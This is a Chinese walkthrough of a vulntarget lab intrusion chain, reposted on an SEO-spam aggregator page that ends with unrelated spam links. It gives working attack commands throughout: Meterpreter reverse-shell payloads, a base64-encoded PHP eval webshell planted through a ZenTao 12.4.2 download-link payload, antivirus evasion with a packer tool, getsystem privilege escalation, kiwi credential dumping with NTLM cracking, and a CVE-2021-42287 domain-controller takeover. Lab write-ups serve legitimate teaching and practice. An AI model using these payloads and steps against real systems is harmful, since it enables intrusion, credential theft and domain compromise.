当前位置: 首页 > news >正文

做网站怎样备案营销型网站有哪些功能

做网站怎样备案,营销型网站有哪些功能,上海传媒公司简介,新闻类网站怎么做seo实际部署之后centos7 的ip有所变动分别是 :192.168.127.130以及10.0.20.30 Centos7 老规矩还是先用fscan扫一下服务和端口,找漏洞打 直接爆出来一个SSH弱口令…,上来就不用打了,什么意思??? 直接xshell…

在这里插入图片描述

实际部署之后centos7 的ip有所变动分别是 :192.168.127.130以及10.0.20.30

Centos7

老规矩还是先用fscan扫一下服务和端口,找漏洞打
在这里插入图片描述

直接爆出来一个SSH弱口令…,上来就不用打了,什么意思???
直接xshell登入,生成一个MSF木马,然后上线。

上线MSF

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.127.129 LPORT=8888 -f elf > mshell.elf
msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.127.129
set lport 8888
run

添加路由

run post/multi/manage/autoroute

看到另外一个网段

[!]  * incompatible session platform: linux
[*] Running module against localhost.localdomain
[*] Searching for subnets to autoroute.
[+] Route added to subnet 10.0.20.0/255.255.255.0 from host's routing table.
[+] Route added to subnet 192.168.127.0/255.255.255.0 from host's routing table.

上传Fscan

直接使用msf的命令即可上传

upload /root/home/tools/fscan /tmp/

然后执行shell命令,获取centos的shell,(你可能会说,都有密码了,直接连接不行吗?害,应急做多了,老是会想到,ssh有记录。)

/usr/bin/script -qc /bin/bash /dev/null   #获得交互式shell

然后执行,执行扫描的时候需要加上-np,因为win10的那一台机器开着防火墙,ping不通

cd /tmp
chmod +x fscan
./fscan -h 10.0.20.1/24  -np   

执行结果,我把不相关的直接删除了,看重点即可。

[root@localhost tmp]# ./fscan -h 10.0.20.1/24 -np___                              _    / _ \     ___  ___ _ __ __ _  ___| | __ / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   fscan version: 1.8.3
start infoscan
10.0.20.66:3306 open
10.0.20.66:8080 open
[*] 扫描结束,耗时: 4m20.058335309s

发现内网有一个10.0.20.66并且开放了33068080端口,先看一下8080端口

WIN10

端口转发

将本地kali的8181端口转发给内网机器10.0.20.668080端口

portfwd add -l 8282 -p 8080 -r 10.0.20.66

这个时候直接访问kali的8282端口就能访问到10.0.20.668181端口了,主要是将centos给当跳板了。
访问了一下,发现是禅道CMS
在这里插入图片描述

账号和密码是弱口令: admin/Admin#123,看其他博主爆出来的,在后台可以看到版本信息,
在这里插入图片描述

这个版本存在一个漏洞:禅道 12.4.2 后台任意文件上传漏洞 CNVD-C-2020-121325,具体漏洞详情不多介绍,网上有很多例子。

禅道CMS

centos中创建一个php🐎

echo PD9waHAgQGV2YWwoJF9QT1NUWydiJ10pOz8+ | base64 -d >> shell.php

然后用python开启一个http服务,centos内置python为python2版本,使用下面命令开启,确保shell.php在执行命令的目录内

python -m SimpleHTTPServer 7777

构造参数

HTTP://10.0.20.30:7777/shell.php
base64加密一下
SFRUUDovLzEwLjAuMjAuMzA6Nzc3Ny9zaGVsbC5waHA=

最终的payload是

http://192.168.127.129:8282/index.php?m=client&f=download&version=1&link=SFRUUDovLzEwLjAuMjAuMzA6Nzc3Ny9zaGVsbC5waHA=

请求一下这个url,禅道会向刚刚开启的那个HTTP服务请求shell.php并且会保存到data\client\1目录中,所以🐎的地址为:http://192.168.127.129:8282/data/client/1/shell.php
连接成功,木马上线

在这里插入图片描述

MSF上线

生成一个反弹shell马,因为正向马过不去,关防火墙也没权限

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.0.20.30 lport=7656 -f exe >7656.exe

使用蚁剑上传,神奇的一幕出现了,上传上去立马就没了,排查一下进程

tasklist 

在这里插入图片描述

复制到进程识别工具中:https://tasklist.pdsec.top/
在这里插入图片描述

发现了火绒程序

免杀

这里直接使用掩日的免杀工具
在这里插入图片描述

这个使用起来特别简单,直接选择好MSF生成的🐎,然后点击生成就会生成一个绕过杀毒软件的木马
MSF启动监听,注意这个IP,不要再设置为kali的IP了

use exploit/multi/handler 
set payload windows/x64/meterpreter/reverse_tcp   
set lhost 10.0.20.30
set lport 7656
run

然后在蚁剑的终端中运行那个木马程序,上线( ̄︶ ̄)↗ 
在这里插入图片描述

再进行一个进程迁移

run post/windows/manage/migrate 

添加路由

run post/multi/manage/autoroute

发现一个10.0.10.0/255.255.255.0的网段
在这里插入图片描述

扫描内网

使用arp扫描一下10.0.10.0/255.255.255.0这个网段的主机

use post/windows/gather/arp_scanner
set rhosts 10.0.10.1-254
set session 3
run

在这一步发生了一件比较离谱的事情,每次扫描的时候,session都会掉
在这里插入图片描述

把火绒关了也是如此,所以我在想是不是有什么bug,于是我换了一种思路,直接上传一个fsca,然后用fscan扫,上传之前,我把火绒开启了,奇怪的是,火绒竟然没有杀掉,可能是规则库太老了。
老规矩还是加上-np参数

fscan.exe -h 10.0.10.1/24 -np

扫描结果

10.0.10.100:135 open
10.0.10.100:139 open
10.0.10.100:445 open

发现了一个10.0.10.100的主机,10.0.10.99是当前主机的IP,先进行一下主机信息收集吧

主机信息收集

通过ipconfig /all可以看到主DNS后缀,基本上可以判定当前主机为域用户
在这里插入图片描述

定位域控
直接使用nslookup解析域名,获得域控的IP,ip为10.0.10.100
在这里插入图片描述

抓取Hash

抓取Hash之前需要先提权一下,要不然抓不了

提权

直接使用MSF自带的功能即可

getsystem

在这里插入图片描述

抓取hash

load kiwi 
creds_all

没有抓取到明文hash
在这里插入图片描述

去cmd5里面解析一下NTLM
解密如下

win101 admin#123

域控

CVE-2021-42287

由于Active Directory没有对域中计算机与服务器账号进行验证,经过身份验证的攻击者利用该漏洞绕过完全限制,可将域中普通用户权限提升为域管理员权限并执行任意代码
我们在win10中已经拿到了域成员的账号和密码:win101/admin#123
POC: https://github.com/WazeHell/sam-the-admin.git

搭建代理

运行这个POC之前需要先搭建一个代理,要不然访问不到

use auxiliary/server/socks_proxy
run

然后进行漏洞利用

proxychains python3 sam_the_admin.py vulntarget.com/win101:'admin#123' -dc-ip 10.0.10.100 -shell

成功拿到域控的shell
在这里插入图片描述

思路

Centos没啥好说的,弱口令打的,Win10是禅道CMS打进去的,然后MSF上线,免杀用的是掩日的工具,添加路由,用CVE-2021-42287打的域控,脚本一把梭,妥妥的脚本小子一个了。

http://www.khdw.cn/news/46455.html

相关文章:

  • 北京 顺义 网站制作抖音推广平台联系方式
  • 专业做网站登录seo顾问阿亮博客
  • 官方网站下载拼多多关键词上首页的有效方法
  • 网站开发的费用百度北京分公司官网
  • 山西省住房和城乡建设厅网站首页房地产销售技巧和话术
  • 功能性的网站云优化
  • 做包子网站企业培训课程
  • 手机音乐网站程序源码百度打广告怎么收费
  • 中英文网站建设医院网站建设方案
  • 19网站建设太原网站建设优化
  • 如何更新动态网站培训网站推广
  • 在工商局网站做年报要交费吗如何发布视频赚钱
  • 石家庄做网站需要多少钱免费下载百度软件
  • visio做网站效果查看今日头条
  • 专注高密做网站的开发一个app平台大概需要多少钱?
  • 网站定制开发流程和功能自动交换友情链接
  • 无锡建设银行官网招聘网站千锋教育可靠吗
  • vps做网站怎么加速全网营销推广方案
  • 网页设计与制作教程pdf下载seo搜狗排名点击
  • 深圳网站制作公司嘉兴百度导航下载2022最新版官网
  • 网站做系统叫什么百度代理查询
  • 百度推广计划seo上海网站推广
  • asp企业网站源码优化网站找哪家
  • b2b买方为主导的网站有哪些国内免费发布产品的平台
  • 建站seo赚钱2021年中国关键词
  • 广州做贷款有什么网站郑州网站推广排名公司
  • 邢台地区网站建设无货源网店怎么开
  • 物流网站建设计划书查网站排名
  • 2023年石家庄疫情最新政策企业seo优化
  • 打电话说帮忙做网站软文新闻发布网站